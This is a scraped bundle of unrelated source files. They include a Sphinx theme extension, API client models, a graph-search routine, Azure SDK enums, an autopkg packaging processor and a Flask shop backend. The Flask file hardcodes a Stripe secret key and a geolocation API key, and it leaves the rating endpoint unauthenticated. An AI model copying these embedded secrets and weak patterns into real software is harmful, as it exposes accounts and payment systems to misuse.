"dark_mode_js/theme_switcher.js",
]
else:
self.config.html_js_files.append(
"dark_mode_js/default_{default_theme}.js".format(
default_theme=default_theme
)
)
self.config.html_js_files.append("dark_mode_js/theme_switcher.js")
def load_css(self):
if "css_files" in self.config.html_context:
self.config.html_context["css_files"].append("_static/dark_mode_css/general.css")
self.config.html_context["css_files"].append("_static/dark_mode_css/dark.css")
return
if not self.config.html_css_files:
self.config.html_css_files = [
"dark_mode_css/general.css",
"dark_mode_css/dark.css",
]
else:
self.config.html_css_files.append("dark_mode_css/general.css")
self.config.html_css_files.append("dark_mode_css/dark.css")
|
py | 1a32e3c29a2e3b70435ca283c0ca304079820098 | """Base class for task type models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import dateutil.parser
from saltant.constants import HTTP_200_OK, HTTP_201_CREATED
from .resource import Model, ModelManager
class BaseTaskType(Model):
"""Base model for a task type.
Attributes:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
user (str): The user associated with the task type.
datetime_created (:class:`datetime.datetime`): The datetime when
the task type was created.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables required
on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for the
task's required arguments.
manager (:class:`saltant.models.base_task_type.BaseTaskTypeManager`):
The task type manager which spawned this task type.
"""
def __init__(
self,
id,
name,
description,
user,
datetime_created,
command_to_run,
environment_variables,
required_arguments,
required_arguments_default_values,
manager,
):
"""Initialize a task type.
Args:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
user (str): The user associated with the task type.
datetime_created (:class:`datetime.datetime`): The datetime
when the task type was created.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables
required on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for
the tasks required arguments.
manager (:class:`saltant.models.base_task_type.BaseTaskTypeManager`):
The task type manager which spawned this task type.
"""
# Call parent constructor
super(BaseTaskType, self).__init__(manager)
self.id = id
self.name = name
self.description = description
self.user = user
self.datetime_created = datetime_created
self.command_to_run = command_to_run
self.environment_variables = environment_variables
self.required_arguments = required_arguments
self.required_arguments_default_values = (
required_arguments_default_values
)
def __str__(self):
"""String representation of the task type."""
return "%s (%s)" % (self.name, self.user)
def sync(self):
"""Sync this model with latest data on the saltant server.
Note that in addition to returning the updated object, it also
updates the existing object.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
This task type instance after syncing.
"""
self = self.manager.get(id=self.id)
return self
def put(self):
"""Updates this task type on the saltant server.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A task type model instance representing the task type
just updated.
"""
return self.manager.put(
id=self.id,
name=self.name,
description=self.description,
command_to_run=self.command_to_run,
environment_variables=self.environment_variables,
required_arguments=self.required_arguments,
required_arguments_default_values=(
self.required_arguments_default_values
),
)
class BaseTaskTypeManager(ModelManager):
"""Base manager for task types.
Attributes:
_client (:class:`saltant.client.Client`): An authenticated
saltant client.
list_url (str): The URL to list task types.
detail_url (str): The URL format to get specific task types.
model (:class:`saltant.models.resource.Model`): The model of the
task type being used.
"""
model = BaseTaskType
def get(self, id=None, name=None):
"""Get a task type.
Either the id xor the name of the task type must be specified.
Args:
id (int, optional): The id of the task type to get.
name (str, optional): The name of the task type to get.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A task type model instance representing the task type
requested.
Raises:
ValueError: Neither id nor name were set *or* both id and
name were set.
"""
# Validate arguments - use an xor
if not ((id is None) ^ (name is None)):
raise ValueError("Either id or name must be set (but not both!)")
# If it's just ID provided, call the parent function
if id is not None:
return super(BaseTaskTypeManager, self).get(id=id)
# Try getting the task type by name
return self.list(filters={"name": name})[0]
def create(
self,
name,
command_to_run,
description="",
environment_variables=None,
required_arguments=None,
required_arguments_default_values=None,
extra_data_to_post=None,
):
"""Create a task type.
Args:
name (str): The name of the task.
command_to_run (str): The command to run to execute the task.
description (str, optional): The description of the task type.
environment_variables (list, optional): The environment
variables required on the host to execute the task.
required_arguments (list, optional): The argument names for
the task type.
required_arguments_default_values (dict, optional): Default
values for the tasks required arguments.
extra_data_to_post (dict, optional): Extra key-value pairs
to add to the request data. This is useful for
subclasses which require extra parameters.
Returns:
:class:`saltant.models.base_task_instance.BaseTaskType`:
A task type model instance representing the task type
just created.
"""
# Set None for optional list and dicts to proper datatypes
if environment_variables is None:
environment_variables = []
if required_arguments is None:
required_arguments = []
if required_arguments_default_values is None:
required_arguments_default_values = {}
# Create the object
request_url = self._client.base_api_url + self.list_url
data_to_post = {
"name": name,
"description": description,
"command_to_run": command_to_run,
"environment_variables": json.dumps(environment_variables),
"required_arguments": json.dumps(required_arguments),
"required_arguments_default_values": json.dumps(
required_arguments_default_values
),
}
# Add in extra data if any was passed in
if extra_data_to_post is not None:
data_to_post.update(extra_data_to_post)
response = self._client.session.post(request_url, data=data_to_post)
# Validate that the request was successful
self.validate_request_success(
response_text=response.text,
request_url=request_url,
status_code=response.status_code,
expected_status_code=HTTP_201_CREATED,
)
# Return a model instance representing the task type
return self.response_data_to_model_instance(response.json())
def put(
self,
id,
name,
description,
command_to_run,
environment_variables,
required_arguments,
required_arguments_default_values,
extra_data_to_put=None,
):
"""Updates a task type on the saltant server.
Args:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables
required on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for
the tasks required arguments.
extra_data_to_put (dict, optional): Extra key-value pairs to
add to the request data. This is useful for subclasses
which require extra parameters.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A :class:`saltant.models.base_task_type.BaseTaskType`
subclass instance representing the task type just
updated.
"""
# Update the object
request_url = self._client.base_api_url + self.detail_url.format(id=id)
data_to_put = {
"name": name,
"description": description,
"command_to_run": command_to_run,
"environment_variables": json.dumps(environment_variables),
"required_arguments": json.dumps(required_arguments),
"required_arguments_default_values": json.dumps(
required_arguments_default_values
),
}
# Add in extra data if any was passed in
if extra_data_to_put is not None:
data_to_put.update(extra_data_to_put)
response = self._client.session.put(request_url, data=data_to_put)
# Validate that the request was successful
self.validate_request_success(
response_text=response.text,
request_url=request_url,
status_code=response.status_code,
expected_status_code=HTTP_200_OK,
)
# Return a model instance representing the task instance
return self.response_data_to_model_instance(response.json())
def response_data_to_model_instance(self, response_data):
"""Convert response data to a task type model.
Args:
response_data (dict): The data from the request's response.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A model instance representing the task type from the
reponse data.
"""
# Coerce datetime strings into datetime objects
response_data["datetime_created"] = dateutil.parser.parse(
response_data["datetime_created"]
)
# Instantiate a model for the task instance
return super(
BaseTaskTypeManager, self
).response_data_to_model_instance(response_data)
|
py | 1a32e4b486aa29929789db5ae26db2a69e173a14 | # -*- coding: utf-8 -*-
'''
这是一个计算origins到targets的自驾行车OD矩阵的exmaple,同时这里会将解析出来的数据存在本地
'''
import pandas as pd
import json
import os
from BaiduMapAPI.api import SearchPlace, MapDirection
AK = os.environ["BaiduAK"]
SK = os.environ["BaiduSK"]
origins_data = pd.read_csv("data/exmaple_citydata_coords.csv", encoding="utf-8")
targets_name = {
"香港":"香港国际机场", "广州": "广州白云国际机场", "深圳":"深圳宝安国际机场",
"珠海":"珠海金湾国际机场", "澳门":"澳门国际机场", "佛山":"佛山沙堤机场",
"惠州":"惠州平潭机场"
}
place = SearchPlace(AK, SK)
dirction = MapDirection(AK, SK)
fw = open("driving_result.csv", "w", encoding="utf-8")
fw.write("origin, target, distance, duration, toll \n")
for name in targets_name:
pois = place.search(targets_name[name], region=name)
poi = pois[0]
loc = poi.get_location()
for i in origins_data.index:
coords = (round(origins_data["lat"][i],5),round(origins_data["lng"][i],5))
print(coords)
content = dirction.driving(loc, coords)
content = json.loads(content)
origin = origins_data["详细地址"][i]
target = targets_name[name]
# 常规路线的距离和时间
if "result" in content:
driving_distance = content["result"]['routes'][0]["distance"]
driving_duration = content["result"]['routes'][0]["duration"]
toll = content["result"]['routes'][0]["toll"]
fw.write("%s, %s, %s, %s, %s \n"%(origin, target, driving_distance, driving_duration, toll))
fw.close() |
py | 1a32e5e806cc87bb3d001badc1a82f26aa335c67 | """
Bidirectional search is a graph search algorithm that finds a shortest path from an initial vertex to a goal
vertex in a directed graph. It runs two simultaneous searches: one forward from the initial state
, and one backward from the goal, stopping when the two meet in the middle. [Wikipedia]
"""
import queue
def _visit(direction_queues, side, node, dist, length):
"""
Function for adding length of the path to the queueues
Args:
direction_queues: queues
side: which side needs to be processed (from tartget or from source)
node: node itself
dist: distances array
length: lenght of the path
"""
if node not in dist[side] or dist[side][node] > length:
dist[side][node] = length
direction_queues[side].put((length, node))
def bidi_dijkstra(graph, start, target):
"""
Calculate shortest path via Dijkstra algorithm, with bidirectional optimization
which means that we start from target and start points and swith between them each step
Args:
graph: graph representation
start: start node
target: target node
Returns:
int: lengths of the shortest path between start and target nodes
Examples:
>>> graph = prepare_weighted_undirect_graph(
[(1, 2, 7), (1, 3, 9), (1, 6, 14), (6, 3, 2), (6, 5, 9), (3, 2, 10), (3, 4, 11),
(2, 4, 15), (6, 5, 9), (5, 4, 6)])
>>> dijkstra(graph, 1, 6)
11
"""
dist = [dict(), dict()]
visits = [set(), set()]
direction_queues = [queue.PriorityQueue(), queue.PriorityQueue()]
_visit(direction_queues, 0, start, dist, 0)
_visit(direction_queues, 1, target, dist, 0)
nodes_process = [[], []]
flip_side = 0
while not direction_queues[0].empty() or not direction_queues[1].empty():
node = direction_queues[flip_side].get()[1]
for adjacent_node, edge_weigth in graph[node].items():
length = dist[flip_side][node] + edge_weigth
_visit(direction_queues, flip_side, adjacent_node, dist, length)
nodes_process[flip_side].append(node)
visits[flip_side].add(node)
if node in visits[flip_side ^ 1]:
return _calc_shortest_path(nodes_process, dist)
if not direction_queues[flip_side ^ 1].empty():
flip_side ^= 1
return -1
def _calc_shortest_path(nodes_process, dist):
"""
Calculate shortest path
Args:
nodes_process: nodes that we met on path
dist: distances
Returns:
int: length shortest path
"""
shortest_path = 10 ** 16
for node in nodes_process[1] + nodes_process[0]:
if node in dist[0] and node in dist[1] and dist[0][node] + dist[1][node] < shortest_path:
shortest_path = dist[0][node] + dist[1][node]
return shortest_path
|
py | 1a32e64ef372e82e97e1bd6a8e79c4cbf33ac6b6 | import os
import sys
import stripe
import datetime
from flask import *
#import cloudinary as Cloud
#import cloudinary.uploader
from Backend.models import *
from Backend import db, bcrypt
from Backend.config import Config
from flask_cors import cross_origin
from Backend.ext import token_required
from Backend.registration.decorator import check_confirmed
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
auth = Blueprint('authorization', __name__)
stripe_keys = {
'secret_key': "sk_test_51IscUOBuSPNXczcenT31xOR1QnW6T2kPpfr0N3JKHvY7Idqb4oQUiOK245Azeac3VgUiN8nNT88vNf2VTkLIVebK00ZeQX3fm7",
'publishable_key': 'pk_test_51IscUOBuSPNXczceSfoIKAm7bARLi4fS9QZr5SNVOMa3aF7zlmIwmarG0fnc2ijpkn1WrVnrs9obt9zCTPihKiBe00tVxBVhKf',
}
stripe.api_key = stripe_keys['secret_key']
Message= "Problem uploading to server... if error persists, send message to [email protected] to lay complaint"
try:
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION == 3:
import urllib.request
resource = urllib.request.urlopen('https://api.ipregistry.co/?key=0umiu3uyv8174l')
else:
import urlparse
resource = urlparse.urlopen('https://api.ipregistry.co/?key=0umiu3uyv8174l')
payload = resource.read().decode('utf-8')
location = json.loads(payload)['location']['country']['name']
country= str(location).lower()
except:
pass
@auth.route('/config')
def get_publishable_key():
stripe_config = {'publicKey': stripe_keys['publishable_key']}
return jsonify(stripe_config)
@auth.route('/api/book/product/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def bookProduct(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
booked = Store.query.filter_by(saved=current_user).first()
already_booked = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if already_booked:
return jsonify({
"message": "Product already booked by you"
})
if not booked:
booked = Store(saved=current_user)
booked.stored_data = product.product_name
db.session.add(booked)
booked.stored_data = product.product_name
if not product:
return jsonify({
"message": "Product not found"
})
try:
product.sold = True
db.session.commit()
return jsonify({
"message": "Product has been booked"
})
except:
return jsonify({
"message": "Problem with our server... Try again"
}), 500
@auth.route('/api/my/booked')
@cross_origin()
@token_required
@check_confirmed
def myBooked(current_user):
store = Store.query.filter_by(saved=current_user).all()
data = []
for product_id in store:
products = Product.query.filter_by(product_name=product_id.stored_data).filter(Product.sold == True).all()
for product in products:
data.append({
'name': product.product_name,
'description': product.description,
"category": product.category,
"price": product.product_price,
"varieties": product.varieties,
"expires": product.expiry_date,
"rate": product.rate
})
return jsonify({
"data": data,
}), 200
@auth.route('/api/checkout/product', methods=['POST'])
@cross_origin()
def checkoutProduct():
data = request.get_json()
product = Product.query.filter_by(product_name = data['name']).first()
if not product :
return jsonify({
"message": "Product not available at the moment"
})
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
elif product.sold == True:
return jsonify({
"message": "Product currently unavailable"
})
intent = stripe.PaymentIntent.create(
amount=product.product_price,
currency=product.currency
)
try:
return jsonify({
'clientSecret': intent['client_secret']
})
except Exception as e:
return jsonify(error=str(e)), 403
@auth.route('/api/add/to/cart/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def addToCart(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "Product is not available at the moment"
})
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
cart = Store.query.filter_by(saved=current_user).first()
already_booked = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if already_booked:
return jsonify({
"message": "Product already in your cart"
})
try:
if not cart:
cart = Store(saved=current_user)
cart.stored_data = product.product_name
db.session.add(cart)
cart.stored_data = product.product_name
db.session.commit()
return jsonify({
"message": "Product successfully add to cart"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/my/cart')
@cross_origin()
@token_required
@check_confirmed
def myStore(current_user):
store = Store.query.filter_by(saved=current_user).all()
data = []
for product_id in store:
products = Product.query.filter_by(product_name=product_id.stored_data).all()
for product in products:
data.append({'name': product.product_name,
'description': product.description,
"category": product.category,
"price": product.product_price,
"varieties": product.varieties,
"expires": product.expiry_date,
"rate": product.rate,
"currency": product.currency
})
return jsonify({
"data": data,
}), 200
@auth.route('/api/remove/from/cart/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def removeFromCart(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "Product is not available at the moment"
})
store = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if not store:
return jsonify({
"message": "product not in your cart"
})
try:
db.session.delete(store)
db.session.commit()
return jsonify({
"message": "Product successfully removed from cart"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/rate/product/<int:product_id>', methods=['POST'])
@cross_origin()
def rate(product_id):
data = request.get_json()
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "product not available"
})
try:
product.rate =product.rate + int(data['rate'])
db.session.commit()
return jsonify({
"message": "Product has been rated"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/add/comment/product/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def addComment(current_user, product_id):
data = request.get_json()
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "product not available"
})
try:
comment = Comment(thought=product)
comment.post = data['post']
db.session.add(comment)
db.session.commit()
return jsonify({
"message": "Comment on product has been posted "
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/comments/product/<int:product_id>')
@cross_origin()
def comments(product_id):
product = Product.query.filter_by(id= product_id).first()
comment = Comment.query.filter_by(thought=product).all()
comment_schema = CommentSchema(many=True)
result = comment_schema.dump(comment)
return jsonify({
"data": result
}), 200
|
py | 1a32e6f2b2560917d2e3b36be397183dec848401 | import os
# Get relative file path
# this returns relative path from current file.
def get_relative_path(curr_file, *path_components):
return os.path.join(os.path.dirname(curr_file), *path_components)
|
py | 1a32e6f6b1fd16d23b052a21b669583a68e7148a | # -*- coding: utf-8 -*-
# Copyright (c) 2015, www.ossph.com and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class RepairOrderItems(Document):
pass
|
py | 1a32e73d6cbce332f1d80e368f8bcb874accbab5 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest import Configuration
from .version import VERSION
class LUISAuthoringClientConfiguration(Configuration):
"""Configuration for LUISAuthoringClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param endpoint: Supported Cognitive Services endpoints (protocol and
hostname, for example: https://westus.api.cognitive.microsoft.com).
:type endpoint: str
:param credentials: Subscription credentials which uniquely identify
client subscription.
:type credentials: None
"""
def __init__(
self, endpoint, credentials):
if endpoint is None:
raise ValueError("Parameter 'endpoint' must not be None.")
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
base_url = '{Endpoint}/luis/authoring/v3.0-preview'
super(LUISAuthoringClientConfiguration, self).__init__(base_url)
# Starting Autorest.Python 4.0.64, make connection pool activated by default
self.keep_alive = True
self.add_user_agent('azure-cognitiveservices-language-luis/{}'.format(VERSION))
self.endpoint = endpoint
self.credentials = credentials
|
py | 1a32e768d4ed1e7a445d9bb617a6dd802cba816f | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class AzureBareMetalHardwareTypeNamesEnum(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Name of the hardware type (vendor and/or their product name)
"""
CISCO_UCS = "Cisco_UCS"
HPE = "HPE"
class AzureBareMetalInstancePowerStateEnum(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Resource power state
"""
STARTING = "starting"
STARTED = "started"
STOPPING = "stopping"
STOPPED = "stopped"
RESTARTING = "restarting"
UNKNOWN = "unknown"
class AzureBareMetalInstanceSizeNamesEnum(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Specifies the AzureBareMetal instance SKU.
"""
S72_M = "S72m"
S144_M = "S144m"
S72 = "S72"
S144 = "S144"
S192 = "S192"
S192_M = "S192m"
S192_XM = "S192xm"
S96 = "S96"
S112 = "S112"
S224 = "S224"
S224_M = "S224m"
S224_OM = "S224om"
S224_OO = "S224oo"
S224_OOM = "S224oom"
S224_OOO = "S224ooo"
S384 = "S384"
S384_M = "S384m"
S384_XM = "S384xm"
S384_XXM = "S384xxm"
S448 = "S448"
S448_M = "S448m"
S448_OM = "S448om"
S448_OO = "S448oo"
S448_OOM = "S448oom"
S448_OOO = "S448ooo"
S576_M = "S576m"
S576_XM = "S576xm"
S672 = "S672"
S672_M = "S672m"
S672_OM = "S672om"
S672_OO = "S672oo"
S672_OOM = "S672oom"
S672_OOO = "S672ooo"
S768 = "S768"
S768_M = "S768m"
S768_XM = "S768xm"
S896 = "S896"
S896_M = "S896m"
S896_OM = "S896om"
S896_OO = "S896oo"
S896_OOM = "S896oom"
S896_OOO = "S896ooo"
S960_M = "S960m"
class AzureBareMetalProvisioningStatesEnum(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""State of provisioning of the AzureBareMetalInstance
"""
ACCEPTED = "Accepted"
CREATING = "Creating"
UPDATING = "Updating"
FAILED = "Failed"
SUCCEEDED = "Succeeded"
DELETING = "Deleting"
MIGRATING = "Migrating"
|
py | 1a32e81dc0cae1078e77b758d3d93ed0d26a4cc0 | #!/usr/bin/env python
#
# Copyright 2010 Per Olofsson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import subprocess
import FoundationPlist
import math
from xml.etree import ElementTree
from autopkglib import Processor, ProcessorError
__all__ = ["PkgInfoCreator"]
class PkgInfoCreator(Processor):
description = "Creates an Info.plist file for a package."
input_variables = {
"template_path": {
"required": True,
"description": "An Info.plist template.",
},
"version": {
"required": True,
"description": "Version of the package.",
},
"pkgroot": {
"required": True,
"description": "Virtual root of the package.",
},
"infofile": {
"required": True,
"description": "Path to the info file to create.",
},
"pkgtype": {
"required": True,
"description": "'flat' or 'bundle'."
}
}
output_variables = {
}
__doc__ = description
def find_template(self):
'''Searches for the template, looking in the recipe directory
and parent recipe directories if needed.'''
template_path = self.env['template_path']
if os.path.exists(template_path):
return template_path
elif not template_path.startswith("/"):
recipe_dir = self.env.get('RECIPE_DIR')
search_dirs = [recipe_dir]
if self.env.get("PARENT_RECIPES"):
# also look in the directories containing the parent recipes
parent_recipe_dirs = list(set([
os.path.dirname(item)
for item in self.env["PARENT_RECIPES"]]))
search_dirs.extend(parent_recipe_dirs)
for directory in search_dirs:
test_item = os.path.join(directory, template_path)
if os.path.exists(test_item):
return test_item
raise ProcessorError("Can't find %s" % template_path)
def main(self):
if self.env['pkgtype'] not in ("bundle", "flat"):
raise ProcessorError("Unknown pkgtype %s" % self.env['pkgtype'])
template = self.load_template(self.find_template(), self.env['pkgtype'])
if self.env['pkgtype'] == "bundle":
self.create_bundle_info(template)
else:
self.create_flat_info(template)
restartaction_to_postinstallaction = {
"None": "none",
"RecommendRestart": "restart",
"RequireLogout": "logout",
"RequireRestart": "restart",
"RequireShutdown": "shutdown",
}
def convert_bundle_info_to_flat(self, info):
pkg_info = ElementTree.Element("pkg-info")
pkg_info.set("format-version", "2")
for bundle, flat in (("IFPkgFlagDefaultLocation", "install-location"),
("CFBundleShortVersionString", "version"),
("CFBundleIdentifier", "identifier")):
if bundle in info:
pkg_info.set(flat, info[bundle])
if "IFPkgFlagAuthorizationAction" in info:
if info["IFPkgFlagAuthorizationAction"] == "RootAuthorization":
pkg_info.set("auth", "root")
else:
pkg_info.set("auth", "none")
if "IFPkgFlagRestartAction" in info:
pkg_info.set("postinstall-action",
self.restartaction_to_postinstallaction[info["IFPkgFlagRestartAction"]])
payload = ElementTree.SubElement(pkg_info, "payload")
if "IFPkgFlagInstalledSize" in info:
payload.set("installKBytes", str(info["IFPkgFlagInstalledSize"]))
return ElementTree.ElementTree(pkg_info)
postinstallaction_to_restartaction = {
"none": "None",
"logout": "RequireLogout",
"restart": "RequireRestart",
"shutdown": "RequireShutdown",
}
def convert_flat_info_to_bundle(self, info):
info = {
#"CFBundleIdentifier": "com.adobe.pkg.FlashPlayer",
"IFPkgFlagAllowBackRev": False,
#"IFPkgFlagAuthorizationAction": "RootAuthorization",
#"IFPkgFlagDefaultLocation": "/",
"IFPkgFlagFollowLinks": True,
"IFPkgFlagInstallFat": False,
"IFPkgFlagIsRequired": False,
"IFPkgFlagOverwritePermissions": False,
"IFPkgFlagRelocatable": False,
#"IFPkgFlagRestartAction": "None",
"IFPkgFlagRootVolumeOnly": False,
"IFPkgFlagUpdateInstalledLanguages": False,
"IFPkgFormatVersion": 0.1,
}
pkg_info = info.getroot()
if pkg_info.tag != "pkg-info":
raise ProcessorError("PackageInfo template root isn't pkg-info")
info["CFBundleShortVersionString"] = pkg_info.get("version", "")
info["CFBundleIdentifier"] = pkg_info.get("identifier", "")
info["IFPkgFlagDefaultLocation"] = pkg_info.get("install-location", "")
if pkg_info.get("auth") == "root":
info["IFPkgFlagAuthorizationAction"] = "RootAuthorization"
else:
raise ProcessorError("Don't know how to convert auth=%s to Info.plist format" % pkg_info.get("auth"))
info["IFPkgFlagRestartAction"] = \
self.postinstallaction_to_restartaction[pkg_info.get("postinstall-action", "none")]
payload = ElementTree.SubElement(pkg_info, "payload")
info["IFPkgFlagInstalledSize"] = payload.get("installKBytes", 0)
return info
def load_template(self, template_path, template_type):
"""Load a package info template in Info.plist or PackageInfo format."""
if template_path.endswith(".plist"):
# Try to load Info.plist in bundle format.
try:
info = FoundationPlist.readPlist(self.env['template_path'])
except BaseException as e:
raise ProcessorError("Malformed Info.plist template %s" % self.env['template_path'])
if template_type == "bundle":
return info
else:
return self.convert_bundle_info_to_flat(info)
else:
# Try to load PackageInfo in flat format.
try:
info = ElementTree.parse(template_path)
except BaseException as e:
raise ProcessorError("Malformed PackageInfo template %s" % self.env['template_path'])
if template_type == "flat":
return info
else:
return self.convert_flat_info_to_bundle(info)
def get_pkgroot_size(self, pkgroot):
"""Return the size of pkgroot (in kilobytes) and the number of files."""
size = 0
nfiles = 0
for (dirpath, dirnames, filenames) in os.walk(pkgroot):
# Count the current directory and the number of files in it.
nfiles += 1 + len(filenames)
for filename in filenames:
path = os.path.join(dirpath, filename)
# Add up file size rounded up to the nearest 4 kB, which
# appears to match what du -sk returns, and what PackageMaker
# uses.
size += int(math.ceil(float(os.lstat(path).st_size) / 4096.0))
return (size, nfiles)
def create_flat_info(self, template):
info = template
pkg_info = info.getroot()
if pkg_info.tag != "pkg-info":
raise ProcessorError("PackageInfo root should be pkg-info")
pkg_info.set("version", self.env['version'])
payload = pkg_info.find("payload")
if payload is None:
payload = ElementTree.SubElement(pkg_info, "payload")
size, nfiles = self.get_pkgroot_size(self.env['pkgroot'])
payload.set("installKBytes", str(size))
payload.set("numberOfFiles", str(nfiles))
info.write(self.env['infofile'])
def create_bundle_info(self, template):
info = template
info["CFBundleShortVersionString"] = self.env['version']
ver = self.env['version'].split(".")
info["IFMajorVersion"] = ver[0]
info["IFMinorVersion"] = ver[1]
size, nfiles = self.get_pkgroot_size(self.env['pkgroot'])
info["IFPkgFlagInstalledSize"] = size
try:
FoundationPlist.writePlist(info, self.env['infofile'])
except BaseException as e:
raise ProcessorError("Couldn't write %s: %s" % (self.env['infofile'], e))
if __name__ == '__main__':
processor = PkgInfoCreator()
processor.execute_shell()
|
py | 1a32e87d929ad042f78c1c6e0c0fbaec593762c8 | # SPDX-License-Identifier: Apache-2.0
#
# The OpenSearch Contributors require contributions made to
# this file be licensed under the Apache-2.0 license or a
# compatible open source license.
from typing import Any
from manifests.component_manifest import ComponentManifest, Components, Component
"""
A BuildManifest is an immutable view of the outputs from a build step
The manifest contains information about the product that was built (in the `build` section),
and the components that made up the build in the `components` section.
The format for schema version 1.0 is:
schema-version: "1.0"
build:
name: string
version: string
architecture: x64 or arm64
components:
- name: string
repository: URL of git repository
ref: git ref that was built (sha, branch, or tag)
commit_id: The actual git commit ID that was built (i.e. the resolved "ref")
artifacts:
maven:
- maven/relative/path/to/artifact
- ...
plugins:
- plugins/relative/path/to/artifact
- ...
libs:
- libs/relative/path/to/artifact
- ...
- ...
"""
class BuildManifest_1_0(ComponentManifest['BuildManifest_1_0', 'BuildComponents_1_0']):
SCHEMA = {
"build": {
"required": True,
"type": "dict",
"schema": {
"architecture": {"required": True, "type": "string"},
"id": {"required": True, "type": "string"},
"name": {"required": True, "type": "string"},
"version": {"required": True, "type": "string"},
},
},
"schema-version": {"required": True, "type": "string", "allowed": ["1.0"]},
"components": {
"type": "list",
"schema": {
"type": "dict",
"schema": {
"artifacts": {
"type": "dict",
"schema": {
"maven": {"type": "list"},
"plugins": {"type": "list"},
"bundle": {"type": "list"},
"core-plugins": {"type": "list"},
"libs": {"type": "list"},
},
},
"commit_id": {"required": True, "type": "string"},
"name": {"required": True, "type": "string"},
"ref": {"required": True, "type": "string"},
"repository": {"required": True, "type": "string"},
"version": {"required": True, "type": "string"},
},
},
},
}
def __init__(self, data: Any):
super().__init__(data)
self.build = self.Build(data["build"])
def __to_dict__(self) -> dict:
return {
"schema-version": "1.0",
"build": self.build.__to_dict__(),
"components": self.components.__to_dict__()
}
class Build:
def __init__(self, data: Any):
self.name = data["name"]
self.version = data["version"]
self.architecture = data["architecture"]
self.id = data["id"]
def __to_dict__(self) -> dict:
return {
"name": self.name,
"version": self.version,
"architecture": self.architecture,
"id": self.id
}
class BuildComponents_1_0(Components['BuildComponent_1_0']):
@classmethod
def __create__(self, data: Any) -> 'BuildComponent_1_0':
return BuildComponent_1_0(data)
class BuildComponent_1_0(Component):
def __init__(self, data: Any):
super().__init__(data)
self.repository = data["repository"]
self.ref = data["ref"]
self.commit_id = data["commit_id"]
self.artifacts = data.get("artifacts", {})
self.version = data["version"]
def __to_dict__(self) -> dict:
return {
"name": self.name,
"repository": self.repository,
"ref": self.ref,
"commit_id": self.commit_id,
"artifacts": self.artifacts,
"version": self.version,
}
|
py | 1a32e968d8eb39d66e0400a1caac7d06754f89ba | class InputReceiver:
pass
def __init__(self):
pass
def get_input(self):
return input()
|
